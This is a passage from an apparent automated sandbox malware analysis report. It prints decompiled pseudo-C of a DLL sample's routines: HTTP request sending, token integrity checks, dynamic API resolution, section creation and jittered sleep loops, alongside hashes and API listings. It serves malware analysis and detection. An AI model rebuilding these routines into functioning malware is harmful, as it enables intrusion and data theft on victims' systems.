                                • Opcode Fuzzy Hash: db2b7afd92f1f10511345ff4ebaf5267084b9dcc4c770caee6057864447a89a8
                                • Instruction Fuzzy Hash: 75F0F832A06731BBF3235BA19CD8F5BBFADFB087D2F018504F60591168C72198108BA5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D458DB, Relevance: 12.1, APIs: 8, Instructions: 75networkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 253 d458db-d458e6 254 d458f2-d45905 253->254 255 d458e8-d458ed call d429c0 253->255 257 d45907-d4590e InternetSetStatusCallback InternetCloseHandle 254->257 258 d45910-d45915 254->258 255->254 257->258 259 d45917-d4591e InternetSetStatusCallback InternetCloseHandle 258->259 260 d45920-d45925 258->260 259->260 261 d45927-d4592e InternetSetStatusCallback InternetCloseHandle 260->261 262 d45930-d4593b 260->262 261->262 263 d45940-d45945 262->263 264 d4593d-d4593e CloseHandle 262->264 265 d45947-d45948 CloseHandle 263->265 266 d4594a-d45951 263->266 264->263 265->266 267 d45953-d4595c call d48b22 266->267 268 d4595f-d45964 266->268 267->268 270 d45966-d45967 call d48b22 268->270 271 d4596c-d45970 268->271 270->271 274 d45972-d45973 call d48b22 271->274 275 d45978-d4597d 271->275 274->275 277 d45985-d45987 275->277 278 d4597f-d45980 call d48b22 275->278 278->277
                                C-Code - Quality: 93%
                                			E00D458DB(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				intOrPtr _t24;
				void* _t37;
				void* _t41;
				intOrPtr* _t45;

				_t41 = __edi;
				_t37 = __ebx;
				_t45 = __eax;
				_t16 =  *((intOrPtr*)(__eax + 0x20));
				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
					E00D429C0(_t16, __ecx, 0xea60);
				}
				_t17 =  *(_t45 + 0x18);
				_push(_t37);
				_push(_t41);
				if(_t17 != 0) {
					InternetSetStatusCallback(_t17, 0);
					InternetCloseHandle( *(_t45 + 0x18)); // executed
				}
				_t18 =  *(_t45 + 0x14);
				if(_t18 != 0) {
					InternetSetStatusCallback(_t18, 0);
					InternetCloseHandle( *(_t45 + 0x14));
				}
				_t19 =  *(_t45 + 0x10);
				if(_t19 != 0) {
					InternetSetStatusCallback(_t19, 0);
					InternetCloseHandle( *(_t45 + 0x10));
				}
				_t20 =  *(_t45 + 0x1c);
				if(_t20 != 0) {
					CloseHandle(_t20);
				}
				_t21 =  *(_t45 + 0x20);
				if(_t21 != 0) {
					CloseHandle(_t21);
				}
				_t22 =  *((intOrPtr*)(_t45 + 8));
				if( *((intOrPtr*)(_t45 + 8)) != 0) {
					E00D48B22(_t22);
					 *((intOrPtr*)(_t45 + 8)) = 0;
					 *((intOrPtr*)(_t45 + 0x30)) = 0;
				}
				_t23 =  *((intOrPtr*)(_t45 + 0xc));
				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
					E00D48B22(_t23);
				}
				_t24 =  *_t45;
				if(_t24 != 0) {
					_t24 = E00D48B22(_t24);
				}
				_t46 =  *((intOrPtr*)(_t45 + 4));
				if( *((intOrPtr*)(_t45 + 4)) != 0) {
					return E00D48B22(_t46);
				}
				return _t24;
			}












                                0x00d458db
                                0x00d458db
                                0x00d458dd
                                0x00d458df
                                0x00d458e6
                                0x00d458ed
                                0x00d458ed
                                0x00d458f2
                                0x00d458f5
                                0x00d458fc
                                0x00d45905
                                0x00d45909
                                0x00d4590e
                                0x00d4590e
                                0x00d45910
                                0x00d45915
                                0x00d45919
                                0x00d4591e
                                0x00d4591e
                                0x00d45920
                                0x00d45925
                                0x00d45929
                                0x00d4592e
                                0x00d4592e
                                0x00d45930
                                0x00d4593b
                                0x00d4593e
                                0x00d4593e
                                0x00d45940
                                0x00d45945
                                0x00d45948
                                0x00d45948
                                0x00d4594a
                                0x00d45951
                                0x00d45954
                                0x00d45959
                                0x00d4595c
                                0x00d4595c
                                0x00d4595f
                                0x00d45964
                                0x00d45967
                                0x00d45967
                                0x00d4596c
                                0x00d45970
                                0x00d45973
                                0x00d45973
                                0x00d45978
                                0x00d4597d
                                0x00000000
                                0x00d45980
                                0x00d45987

                                APIs
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 00D45909
                                • InternetCloseHandle.WININET(?), ref: 00D4590E
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 00D45919
                                • InternetCloseHandle.WININET(?), ref: 00D4591E
                                • InternetSetStatusCallback.WININET(?,00000000), ref: 00D45929
                                • InternetCloseHandle.WININET(?), ref: 00D4592E
                                • CloseHandle.KERNEL32(?,00000000,00000102,?,?,00D493DC,?,?,00000000,00000000,74E481D0), ref: 00D4593E
                                • CloseHandle.KERNEL32(?,00000000,00000102,?,?,00D493DC,?,?,00000000,00000000,74E481D0), ref: 00D45948
                                  • Part of subcall function 00D429C0: WaitForMultipleObjects.KERNEL32(00000002,00D4A923,00000000,00D4A923,?,?,?,00D4A923,0000EA60), ref: 00D429DB
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
                                • String ID:
                                • API String ID: 2824497044-0
                                • Opcode ID: 119ae198a91de30c24545b11ed439bf7a7158c562cf55651d622aa26360812dd
                                • Instruction ID: 5bf5badbcce346384a2cc833b59569d19a6f207e6d60e584f394d58a9062f1a4
                                • Opcode Fuzzy Hash: 119ae198a91de30c24545b11ed439bf7a7158c562cf55651d622aa26360812dd
                                • Instruction Fuzzy Hash: 5711AD76600B58ABC630AFAAEC84C1BF7E9FF453603994D19F196D3516CB21FC448A74
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D4A2C6, Relevance: 10.6, APIs: 7, Instructions: 75COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 292 d4a2c6-d4a2e1 293 d4a2e7-d4a300 OpenProcessToken 292->293 294 d4a380-d4a38c 292->294 295 d4a302-d4a32d GetTokenInformation * 2 293->295 296 d4a37f 293->296 297 d4a375-d4a37e CloseHandle 295->297 298 d4a32f-d4a33c call d41525 295->298 296->294 297->296 301 d4a374 298->301 302 d4a33e-d4a34f GetTokenInformation 298->302 301->297 303 d4a351-d4a36b GetSidSubAuthorityCount GetSidSubAuthority 302->303 304 d4a36e-d4a36f call d48b22 302->304 303->304 304->301
                                C-Code - Quality: 100%
                                			E00D4A2C6(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0xd4d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E00D41525(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E00D48B22(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}









                                0x00d4a2d3
                                0x00d4a2da
                                0x00d4a2e1
                                0x00d4a2f5
                                0x00d4a300
                                0x00d4a318
                                0x00d4a325
                                0x00d4a328
                                0x00d4a32d
                                0x00d4a338
                                0x00d4a33c
                                0x00d4a34b
                                0x00d4a34f
                                0x00d4a36b
                                0x00d4a36b
                                0x00d4a36f
                                0x00d4a36f
                                0x00d4a374
                                0x00d4a378
                                0x00d4a37e
                                0x00d4a37f
                                0x00d4a386
                                0x00d4a38c

                                APIs
                                • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00D4A2F8
                                • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 00D4A318
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00D4A328
                                • CloseHandle.KERNEL32(00000000), ref: 00D4A378
                                  • Part of subcall function 00D41525: RtlAllocateHeap.NTDLL(00000000,00000000,00D41278), ref: 00D41531
                                • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 00D4A34B
                                • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00D4A353
                                • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00D4A363
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                • String ID:
                                • API String ID: 1295030180-0
                                • Opcode ID: 2f00e1d3fe981794bd4b58ef389acbd73bd565f62641a2f3ba50b2aa587b39e2
                                • Instruction ID: 7b2a7a69f67ed90abb8f5855ad1f70e8e8e34aa7b3ff64cda70d4ceafb675ff0
                                • Opcode Fuzzy Hash: 2f00e1d3fe981794bd4b58ef389acbd73bd565f62641a2f3ba50b2aa587b39e2
                                • Instruction Fuzzy Hash: 7D213979900248FFEB109FA4DC88EEEBBB9EB49304F1440A5F510A62A1D7719E45EF70
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 10001015, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 347 10001015-10001027 call 10001b5a 350 100010e8 347->350 351 1000102d-10001062 GetModuleHandleA GetProcAddress 347->351 354 100010ef-100010f6 350->354 352 100010e0-100010e6 call 1000167e 351->352 353 10001064-10001078 GetProcAddress 351->353 352->354 353->352 355 1000107a-1000108e GetProcAddress 353->355 355->352 357 10001090-100010a4 GetProcAddress 355->357 357->352 359 100010a6-100010ba GetProcAddress 357->359 359->352 360 100010bc-100010cd call 1000119d 359->360 362 100010d2-100010d7 360->362 362->352 363 100010d9-100010de 362->363 363->354
                                C-Code - Quality: 100%
                                			E10001015(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E10001B5A(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x10004144 + 0x10005014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x10004144 + 0x10005151);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E1000167E(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x10004144 + 0x10005161);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x10004144 + 0x10005174);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x10004144 + 0x10005189);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x10004144 + 0x1000519f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E1000119D(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












                                0x10001023
                                0x10001027
                                0x100010e8
                                0x1000102d
                                0x10001045
                                0x10001054
                                0x1000105b
                                0x1000105d
                                0x10001062
                                0x100010e0
                                0x100010e1
                                0x10001064
                                0x10001071
                                0x10001073
                                0x10001078
                                0x00000000
                                0x1000107a
                                0x10001087
                                0x10001089
                                0x1000108e
                                0x00000000
                                0x10001090
                                0x1000109d
                                0x1000109f
                                0x100010a4
                                0x00000000
                                0x100010a6
                                0x100010b3
                                0x100010b5
                                0x100010ba
                                0x00000000
                                0x100010bc
                                0x100010c2
                                0x100010c8
                                0x100010cd
                                0x100010d2
                                0x100010d7
                                0x00000000
                                0x100010d9
                                0x100010dc
                                0x100010dc
                                0x100010d7
                                0x100010ba
                                0x100010a4
                                0x1000108e
                                0x10001078
                                0x10001062
                                0x100010f6

                                APIs
                                  • Part of subcall function 10001B5A: HeapAlloc.KERNEL32(00000000,?,10001567,00000030,74E063F0,00000000), ref: 10001B66
                                • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,10001135,?,?,?,?,?,00000002,?,?), ref: 10001039
                                • GetProcAddress.KERNEL32(00000000,?), ref: 1000105B
                                • GetProcAddress.KERNEL32(00000000,?), ref: 10001071
                                • GetProcAddress.KERNEL32(00000000,?), ref: 10001087
                                • GetProcAddress.KERNEL32(00000000,?), ref: 1000109D
                                • GetProcAddress.KERNEL32(00000000,?), ref: 100010B3
                                  • Part of subcall function 1000119D: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,?), ref: 100011FA
                                  • Part of subcall function 1000119D: memset.NTDLL ref: 1000121C
                                Memory Dump Source
                                • Source File: 00000000.00000002.797650137.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000000.00000002.797669903.0000000010005000.00000040.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_10000000_loaddll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                • String ID:
                                • API String ID: 1632424568-0
                                • Opcode ID: 561e4cdbb971f4d8e66d7611e3d00db434181d84937a82a0bb5f0063f0d53984
                                • Instruction ID: 2943e8e674912cac2eae58d6d970e7e89ef88163b07fe81432c65c35558539c2
                                • Opcode Fuzzy Hash: 561e4cdbb971f4d8e66d7611e3d00db434181d84937a82a0bb5f0063f0d53984
                                • Instruction Fuzzy Hash: 70214DB060074AAFE711DFAACC90A9BB7ECEF443C17018466F544C7219EBB1E944CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D42789, Relevance: 9.1, APIs: 6, Instructions: 61sleepmemorytimeCOMMON
                                Download Yara Rule
                                C-Code - Quality: 74%
                                			E00D42789(void* __ecx, void* __edx, intOrPtr _a4) {
				struct _FILETIME _v12;
				void* _t10;
				void* _t12;
				int _t14;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t27;
				signed int _t34;

				_t27 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t10 = HeapCreate(0, 0x400000, 0); // executed
				 *0xd4d238 = _t10;
				if(_t10 != 0) {
					 *0xd4d1a8 = GetTickCount();
					_t12 = E00D49EBB(_a4);
					if(_t12 == 0) {
						do {
							GetSystemTimeAsFileTime( &_v12);
							_t14 = SwitchToThread();
							_t23 = _v12.dwHighDateTime;
							_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
							_push(0);
							_push(0x13);
							_push(_t23 >> 5);
							_push(_t16);
							L00D4B0CA();
							_t34 = _t14 + _t16;
							_t18 = E00D4122B(_a4, _t34);
							_t19 = 3;
							_t26 = _t34 & 0x00000007;
							Sleep(_t19 << (_t34 & 0x00000007)); // executed
						} while (_t18 == 1);
						if(E00D44D4D(_t26) != 0) {
							 *0xd4d260 = 1; // executed
						}
						_t12 = E00D42F70(_t27); // executed
					}
				} else {
					_t12 = 8;
				}
				return _t12;
			}













                                0x00d42789
                                0x00d4278f
                                0x00d42790
                                0x00d4279c
                                0x00d427a2
                                0x00d427a9
                                0x00d427b9
                                0x00d427be
                                0x00d427c5
                                0x00d427c7
                                0x00d427cc
                                0x00d427d2
                                0x00d427d8
                                0x00d427e2
                                0x00d427e6
                                0x00d427e8
                                0x00d427ed
                                0x00d427ee
                                0x00d427ef
                                0x00d427f4
                                0x00d427fa
                                0x00d42805
                                0x00d42806
                                0x00d4280c
                                0x00d42812
                                0x00d4281e
                                0x00d42820
                                0x00d42820
                                0x00d4282a
                                0x00d4282a
                                0x00d427ab
                                0x00d427ad
                                0x00d427ad
                                0x00d42834

                                APIs
                                • HeapCreate.KERNEL32(00000000,00400000,00000000,?,00000001,?,?,?,00D47F25,?), ref: 00D4279C
                                • GetTickCount.KERNEL32 ref: 00D427B0
                                • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001,?,?,?,00D47F25,?), ref: 00D427CC
                                • SwitchToThread.KERNEL32(?,00000001,?,?,?,00D47F25,?), ref: 00D427D2
                                • _aullrem.NTDLL(?,?,00000013,00000000), ref: 00D427EF
                                • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,00D47F25,?), ref: 00D4280C
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                • String ID:
                                • API String ID: 507476733-0
                                • Opcode ID: 59da4a926ccd8997ea181a1716f59db1128ec68df43c15340b3f041c93010a8b
                                • Instruction ID: a55952041fffb59202512d2f81e19ca06b8b68b481548b92cb00e11a28b064af
                                • Opcode Fuzzy Hash: 59da4a926ccd8997ea181a1716f59db1128ec68df43c15340b3f041c93010a8b
                                • Instruction Fuzzy Hash: 3311E576A50300BBD760AFB4DC5AB6A76A8DB45351F444129F905C73E0EBB0D8408674
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D497F7, Relevance: 9.0, APIs: 6, Instructions: 45networkCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E00D497F7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E00D48CFA(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E00D4A85C(_t9, _t18, _t22, _a8); // executed
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                0x00d497f7
                                0x00d49804
                                0x00d49806
                                0x00d49869
                                0x00000000
                                0x00d49869
                                0x00d4981e
                                0x00d49825
                                0x00d49831
                                0x00d49836
                                0x00d4984c
                                0x00d4985c
                                0x00000000
                                0x00d4984e
                                0x00d4984e
                                0x00d49855
                                0x00d49862
                                0x00d49862
                                0x00d49862
                                0x00d49855
                                0x00d4984c
                                0x00d49867
                                0x00000000
                                0x00000000
                                0x00d4986d

                                APIs
                                • ResetEvent.KERNEL32(?,00000008,?,?,00000102,00D4937B,?,?,00000000,00000000), ref: 00D49831
                                • ResetEvent.KERNEL32(?), ref: 00D49836
                                • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 00D49843
                                • GetLastError.KERNEL32 ref: 00D4984E
                                • GetLastError.KERNEL32(?,?,00000102,00D4937B,?,?,00000000,00000000), ref: 00D49869
                                  • Part of subcall function 00D48CFA: lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,00D49816,?,?,?,?,00000102,00D4937B,?,?,00000000), ref: 00D48D06
                                  • Part of subcall function 00D48CFA: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00D49816,?,?,?,?,00000102,00D4937B,?), ref: 00D48D64
                                  • Part of subcall function 00D48CFA: lstrcpy.KERNEL32(00000000,00000000), ref: 00D48D74
                                • SetEvent.KERNEL32(?), ref: 00D4985C
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                                • String ID:
                                • API String ID: 3739416942-0
                                • Opcode ID: 77bed403aee18e3407a999f4f8d5042835a5fe414810aa2feb58004c2f141ed5
                                • Instruction ID: 7e836ee0920241ae3b3e73fc3ca6f0a426c9fe7e8870ebe559eff5f46f10cfb2
                                • Opcode Fuzzy Hash: 77bed403aee18e3407a999f4f8d5042835a5fe414810aa2feb58004c2f141ed5
                                • Instruction Fuzzy Hash: 09014B31111300ABDB316F3ADC44F1BB6A8EF56364F584A25F551D51E0D621DC05AA71
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D41128, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 29sleepmemoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 50%
                                			E00D41128(void** __esi) {
				intOrPtr _v0;
				intOrPtr _t4;
				intOrPtr _t6;
				void* _t8;
				void* _t9;
				intOrPtr _t10;
				void* _t11;
				void** _t13;

				_t13 = __esi;
				_t4 =  *0xd4d32c; // 0x32895b0
				__imp__(_t4 + 0x40);
				while(1) {
					_t6 =  *0xd4d32c; // 0x32895b0
					_t1 = _t6 + 0x58; // 0x0
					if( *_t1 == 0) {
						break;
					}
					Sleep(0xa);
				}
				_t8 =  *_t13;
				if(_t8 != 0 && _t8 != 0xd4d030) {
					HeapFree( *0xd4d238, 0, _t8);
				}
				_t9 = E00D44A2A(_v0, _t13); // executed
				_t13[1] = _t9;
				_t10 =  *0xd4d32c; // 0x32895b0
				_t11 = _t10 + 0x40;
				__imp__(_t11);
				return _t11;
			}











                                0x00d41128
                                0x00d41128
                                0x00d41131
                                0x00d41141
                                0x00d41141
                                0x00d41146
                                0x00d4114b
                                0x00000000
                                0x00000000
                                0x00d4113b
                                0x00d4113b
                                0x00d4114d
                                0x00d41151
                                0x00d41163
                                0x00d41163
                                0x00d4116e
                                0x00d41173
                                0x00d41176
                                0x00d4117b
                                0x00d4117f
                                0x00d41185

                                APIs
                                • RtlEnterCriticalSection.NTDLL(03289570), ref: 00D41131
                                • Sleep.KERNEL32(0000000A,?,00D430F3), ref: 00D4113B
                                • HeapFree.KERNEL32(00000000,00000000,?,00D430F3), ref: 00D41163
                                • RtlLeaveCriticalSection.NTDLL(03289570), ref: 00D4117F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.796535569.0000000000D41000.00000020.00020000.sdmp, Offset: 00D40000, based on PE: true
                                • Associated: 00000000.00000002.796511171.0000000000D40000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796588201.0000000000D4C000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796607037.0000000000D4D000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.796628462.0000000000D4F000.00000002.00020000.sdmp Download File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d40000_loaddll32.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                                • String ID: Ut
                                • API String ID: 58946197-8415677
                                • Opcode ID: e292a230fd14c0e892d3017683b1e2d3e57bfc786b4c11018043d8a2d1c3ea21
                                • Instruction ID: 9e59217c917a962af86b4582371011ff3c3d4787bb82a9d905f94d3584fe1a25
                                • Opcode Fuzzy Hash: e292a230fd14c0e892d3017683b1e2d3e57bfc786b4c11018043d8a2d1c3ea21
                                • Instruction Fuzzy Hash: 62F0D47C611340DFE7209F69EC49B167BA9AB16781B089414F642D6375C620E881DB35
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00D42F70, Relevance: 7.7, APIs: 5, Instructions: 159memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 57%
                                			E00D42F70(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E00D459A4();
				if(_t21 != 0) {
					_t59 =  *0xd4d25c; // 0x2000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0xd4d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0xd4d160(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E00D42B6F( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0xd4d2a8; // 0x253a5a8
					if( *0xd4d25c > 5) {
						_t8 = _t26 + 0xd4e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0xd4e9f5; // 0x44283a44
						_t27 = _t7;
					}
					E00D49154(_t27, _t27);
					_t31 = E00D48E0D(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0xd4d270 =  *0xd4d270 ^ 0x81bbe65d;
						_t32 = E00D41525(0x60);
						 *0xd4d32c = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0xd4d32c; // 0x32895b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0xd4d32c; // 0x32895b0
							 *_t51 = 0xd4e81a;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0xd4d238, 0, 0x43);
							 *0xd4d2c8 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0xd4d25c; // 0x2000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0xd4d2a8; // 0x253a5a8
								_t13 = _t58 + 0xd4e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0xd4c287);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E00D47A2E( ~_v8 &  *0xd4d270,  &E00D4D00C); // executed
								_t42 = E00D47FBE(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E00D450E8(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E00D47C3D(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E00D446B2(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0xd4d15c();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
